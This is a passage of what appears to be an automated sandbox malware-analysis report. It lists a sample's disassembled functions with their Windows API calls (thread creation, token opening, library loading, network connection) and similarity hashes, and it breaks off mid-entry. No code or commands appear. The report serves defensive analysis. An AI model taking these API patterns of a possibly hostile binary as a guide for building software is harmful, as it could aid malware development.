                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 0e31a196838b77742f68b178ae0ac22c09f554d10720ad6bf42074adf9516f73
                                                                                                                        • Instruction ID: 0577911197ff0d9eda2f5f1547808625cc7fdeb60b4ac0123afe4dfc1f0706d7
                                                                                                                        • Opcode Fuzzy Hash: 0e31a196838b77742f68b178ae0ac22c09f554d10720ad6bf42074adf9516f73
                                                                                                                        • Instruction Fuzzy Hash: 5D113C3AD01219FFEB10DBA8CD85FADBB78FB04750F204091E605B7290D6716E50EB94
                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0057E1FD
                                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 0057E230
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0057E246
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0057E24D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2880819207-0
                                                                                                                        • Opcode ID: 44bb02ebff3f51d0f81813ce3abf94dedf1ecfccc55a93e6e85c111484fe78b0
                                                                                                                        • Instruction ID: 7a3988581c14abb129092fbf58bd38d92f583a2ca32feb2387fa17234d5a64a6
                                                                                                                        • Opcode Fuzzy Hash: 44bb02ebff3f51d0f81813ce3abf94dedf1ecfccc55a93e6e85c111484fe78b0
                                                                                                                        • Instruction Fuzzy Hash: 2F112B76A04354BBC7059FA8EC4AA9F7FADEB5A310F008655F819D7291D670CD0897A0
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNEL32(00000000,?,0053CFF9,00000000,00000004,00000000), ref: 0053D218
                                                                                                                        • GetLastError.KERNEL32 ref: 0053D224
                                                                                                                        • __dosmaperr.LIBCMT ref: 0053D22B
                                                                                                                        • ResumeThread.KERNEL32(00000000), ref: 0053D249
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 173952441-0
                                                                                                                        • Opcode ID: 4a4ffae62088c53692ce58d9f1487e89508639edc2905e7017118c0ec1cd82db
                                                                                                                        • Instruction ID: d45ad4c648fb10770a3f34014536dc83df1b13599ed28869aad4c22a23baeec2
                                                                                                                        • Opcode Fuzzy Hash: 4a4ffae62088c53692ce58d9f1487e89508639edc2905e7017118c0ec1cd82db
                                                                                                                        • Instruction Fuzzy Hash: 8B01C03A805205BBCB215BA5EC09AAB7F79FF82731F100219F925921D0DF718905D7B0
                                                                                                                        APIs
                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00533B56
                                                                                                                          • Part of subcall function 00533AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00533AD2
                                                                                                                          • Part of subcall function 00533AA3: ___AdjustPointer.LIBCMT ref: 00533AED
                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00533B6B
                                                                                                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00533B7C
                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00533BA4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 737400349-0
                                                                                                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                        • Instruction ID: f06acc09e4593976fed23c5dc7da80649af29af9ef4ed75e1183013d4221a169
                                                                                                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                                        • Instruction Fuzzy Hash: CC01E932100149BBDF125E95CC4AEEB7F69FF98754F044014FE4866121C736E961DBA0
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005113C6,00000000,00000000,?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue), ref: 005430A5
                                                                                                                        • GetLastError.KERNEL32(?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue,005B2290,FlsSetValue,00000000,00000364,?,00542E46), ref: 005430B1
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue,005B2290,FlsSetValue,00000000), ref: 005430BF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177248105-0
                                                                                                                        • Opcode ID: 44481e7845afbf6406d13e7582b9270bbef0e4905ff1adf5a953710904a22a5a
                                                                                                                        • Instruction ID: f2fed4ac56fc8efa5cff5c1b14f288658ecd53835b938a4d63b369a4f0a037f9
                                                                                                                        • Opcode Fuzzy Hash: 44481e7845afbf6406d13e7582b9270bbef0e4905ff1adf5a953710904a22a5a
                                                                                                                        • Instruction Fuzzy Hash: B4012B36301622ABCB314B789C4CA977FD8BF16B65B200720F90DE7160D721DD09C6E0
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0057747F
                                                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00577497
                                                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005774AC
                                                                                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 005774CA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1352324309-0
                                                                                                                        • Opcode ID: 2196ade24e098f3051b76bb2e59be5ba11d3f95ddb171f1d1f0995e41220346c
                                                                                                                        • Instruction ID: b428db24a8e2cfd7b177b09b814ab7e5dd40fe082681dfb19efc57fad476ba2b
                                                                                                                        • Opcode Fuzzy Hash: 2196ade24e098f3051b76bb2e59be5ba11d3f95ddb171f1d1f0995e41220346c
                                                                                                                        • Instruction Fuzzy Hash: 2D115EB52053199BEB208F24FC09F927FFDFB08B04F10C969A66AD6151D7B0E908EB50
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0C4
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0E9
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0F3
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B126
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2875609808-0
                                                                                                                        • Opcode ID: b169ba9a6fa6bb47b6f596badd9c1977d522f5af8ac7ca63f8567c3d9dd268cc
                                                                                                                        • Instruction ID: 526469fef58ce4f13997d9a2c1d5ba6b1fd7f46e53ea40b979a20e7d06872028
                                                                                                                        • Opcode Fuzzy Hash: b169ba9a6fa6bb47b6f596badd9c1977d522f5af8ac7ca63f8567c3d9dd268cc
                                                                                                                        • Instruction Fuzzy Hash: 75117930E01529E7DF00AFE4E9A8BEEBF78FF5A311F008486D945B2181CB305655EB51
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00572DC5
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00572DD6
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00572DDD
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00572DE4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2710830443-0
                                                                                                                        • Opcode ID: 344b7d775e18aee94c14438d19be04ade4602f15936627034996f612069c5f11
                                                                                                                        • Instruction ID: 95905d093804b29c87b2925ec2f55ab28fb7749f35a8b20dd49f0099a903da29
                                                                                                                        • Opcode Fuzzy Hash: 344b7d775e18aee94c14438d19be04ade4602f15936627034996f612069c5f11
                                                                                                                        • Instruction Fuzzy Hash: 38E092B16012347BD7305B76AC0DFEB3E6CFF63BA1F004015F109D20809AA0C845E6B0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00529639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
                                                                                                                          • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296A2
                                                                                                                          • Part of subcall function 00529639: BeginPath.GDI32(?), ref: 005296B9
                                                                                                                          • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296E2
                                                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 005A8887
                                                                                                                        • LineTo.GDI32(?,?,?), ref: 005A8894
                                                                                                                        • EndPath.GDI32(?), ref: 005A88A4
                                                                                                                        • StrokePath.GDI32(?), ref: 005A88B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1539411459-0
                                                                                                                        • Opcode ID: 86e18fa264ac55a03956f98fa905e907e81f48d66c16808471dbced522369982
                                                                                                                        • Instruction ID: 90fb1ba7bc6ae5c7aaccbfeb9de6460cc5d76bdcd182896492d68d60d2a58c1b
                                                                                                                        • Opcode Fuzzy Hash: 86e18fa264ac55a03956f98fa905e907e81f48d66c16808471dbced522369982
                                                                                                                        • Instruction Fuzzy Hash: ABF03A36045659BADB125F94AC0DFDE3E59BF27310F448000FA11650E2CB795515EBA9
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000008), ref: 005298CC
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 005298D6
                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 005298E9
                                                                                                                        • GetStockObject.GDI32(00000005), ref: 005298F1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$ModeObjectStockText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4037423528-0
                                                                                                                        • Opcode ID: fdf6603537d52c9d4adb0155221fe6a5cb8cc3c0d570d87573f395080bf49304
                                                                                                                        • Instruction ID: babda23092f530fcf023f160b2149b06ff6ffa12fd385980bdd04a0b603c7173
                                                                                                                        • Opcode Fuzzy Hash: fdf6603537d52c9d4adb0155221fe6a5cb8cc3c0d570d87573f395080bf49304
                                                                                                                        • Instruction Fuzzy Hash: 77E06D31644284ABDB215B74BC09BE83F60FB27336F048219F6FA581E1C7724684EB10
                                                                                                                        APIs
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00571634
                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,005711D9), ref: 0057163B
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005711D9), ref: 00571648
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,005711D9), ref: 0057164F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3974789173-0
                                                                                                                        • Opcode ID: 6d78daf8af01a9f0b2d155c7cc239e2065791bb06a459dc144e30e1677b3d84a
                                                                                                                        • Instruction ID: 9fd6a7abfb0923c10368a160921ec55014196553daf74aa5e51fb240e99b5b65
                                                                                                                        • Opcode Fuzzy Hash: 6d78daf8af01a9f0b2d155c7cc239e2065791bb06a459dc144e30e1677b3d84a
                                                                                                                        • Instruction Fuzzy Hash: 70E08635601211DBD7201FA5AD0DB4B3F7CBF66791F148808F245C9080D6344548E754
                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 0056D858
                                                                                                                        • GetDC.USER32(00000000), ref: 0056D862
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0056D882
                                                                                                                        • ReleaseDC.USER32(?), ref: 0056D8A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: fe3f31decb965d1eff72b2794d78ec19c2547cf145b65ae4249fd8c78f015923
                                                                                                                        • Instruction ID: ca8919bc23010366900ac9e3378c651b0e0ab707e0499b170370e9ed39fb7596
                                                                                                                        • Opcode Fuzzy Hash: fe3f31decb965d1eff72b2794d78ec19c2547cf145b65ae4249fd8c78f015923
                                                                                                                        • Instruction Fuzzy Hash: 69E01AB4800205DFCB419FA4D80C66DBFB1FB19310F108409E806E7350CB388945AF50
                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 0056D86C
                                                                                                                        • GetDC.USER32(00000000), ref: 0056D876
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0056D882
                                                                                                                        • ReleaseDC.USER32(?), ref: 0056D8A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: 587933b3dbc702fa7ea6e77ed2ba42330fd5dfb5924db8b132cafcaaa00c6018
                                                                                                                        • Instruction ID: 967b2f4171f1099f455d179a3d3f2215e27ba0317e127c4cc6dd779dd11b1383
                                                                                                                        • Opcode Fuzzy Hash: 587933b3dbc702fa7ea6e77ed2ba42330fd5dfb5924db8b132cafcaaa00c6018
                                                                                                                        • Instruction Fuzzy Hash: 78E012B4800204EFCB41AFA4D80C66EBFB1BB19310B108408E80AE7360CB38990AAF50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00584ED4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Connection_wcslen
                                                                                                                        • String ID: *$LPT
                                                                                                                        • API String ID: 1725874428-3443410124
                                                                                                                        • Opcode ID: fd9859d703cb9dce0d4a2c527184bd683cb58c4f5888f4568e57e0fd7730efa5
                                                                                                                        • Instruction ID: ec4d1fe4e7100715e07138861d22498cf32366a0cc2e57413c7249f885553b84
                                                                                                                        • Opcode Fuzzy Hash: fd9859d703cb9dce0d4a2c527184bd683cb58c4f5888f4568e57e0fd7730efa5
                                                                                                                        • Instruction Fuzzy Hash: BB914A75A002059FDB14EF58C484AAABFB5BF48304F198099ED0AAB362D731ED85CF91
                                                                                                                        APIs
                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 0053E30D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                        • String ID: pow
                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                        • Opcode ID: a521351e38fd914cd9748babc6443914a3f291837160b753a9f2b414ba0853ca
                                                                                                                        • Instruction ID: 3c105a0531dd9e4f1d239972786d0b5c7827b106ddec0575143a0e72a3a4b853
                                                                                                                        • Opcode Fuzzy Hash: a521351e38fd914cd9748babc6443914a3f291837160b753a9f2b414ba0853ca
                                                                                                                        • Instruction Fuzzy Hash: 5E515971E1C20A96CB157724C9473FA3FE8FB54744F208E98E095832E9EB309C95AA46
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(0056569E,00000000,?,005ACC08,?,00000000,00000000), ref: 005978DD
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • CharUpperBuffW.USER32(0056569E,00000000,?,005ACC08,00000000,?,00000000,00000000), ref: 0059783B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper$_wcslen
                                                                                                                        • String ID: <s]
                                                                                                                        • API String ID: 3544283678-3287859866
                                                                                                                        • Opcode ID: 19e8ceec31a0eaf7aec6d7496e4f8122198863ddef39dc8de6b698e883de127f
                                                                                                                        • Instruction ID: f78ab4f2a3c13ab3eb41a6b18f90cb29e4d93f20758be01d84cf36e5052db489
                                                                                                                        • Opcode Fuzzy Hash: 19e8ceec31a0eaf7aec6d7496e4f8122198863ddef39dc8de6b698e883de127f
                                                                                                                        • Instruction Fuzzy Hash: C9616B7292411AAADF04EBA4CC95DFDBB78FF58300F540926E542A3191EF306A85DBA0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
